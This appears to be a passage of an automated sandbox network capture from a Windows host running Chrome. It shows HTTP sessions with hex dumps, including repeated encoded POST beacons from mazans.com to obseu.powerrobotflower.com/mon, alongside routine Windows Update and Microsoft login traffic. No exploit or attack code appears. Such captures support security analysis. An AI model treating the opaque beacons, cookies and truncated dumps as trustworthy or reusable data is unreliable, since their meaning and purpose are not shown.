                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:25 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          131192.168.2.174997954.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:27 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1868
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:27 UTC1868OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:27 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:27 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          132192.168.2.17499823.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:28 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:29 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          133192.168.2.174998654.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:32 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1868
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:32 UTC1868OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:32 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:32 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          134192.168.2.17499883.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:33 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:33 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          135192.168.2.174999452.149.20.212443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:39 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bspA476fsYy55S4&MD=WXEEmc47 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:40 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                                                                                                          MS-CorrelationId: b10ab125-1790-4b50-b46c-0f23cdcfc119
                                                                                                                                                                                                                                                                                                                                                                          MS-RequestId: c14cb6f2-ed67-4bab-9075-3412febffcff
                                                                                                                                                                                                                                                                                                                                                                          MS-CV: /jgI5ZTu1E23z87q.0
                                                                                                                                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 30005
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:40 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:40 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          136192.168.2.174999954.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:48 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1868
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:48 UTC1868OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:48 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:48 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          137192.168.2.17500023.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:49 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:49 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:49 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          138192.168.2.175000840.126.31.73443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:00 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4808
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:00 UTC4808OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:01 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:29:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_BAY
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 6b59179b-a450-4bb5-b154-a16f81813f95
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: PH1PEPF00011E50 V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:30:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11197
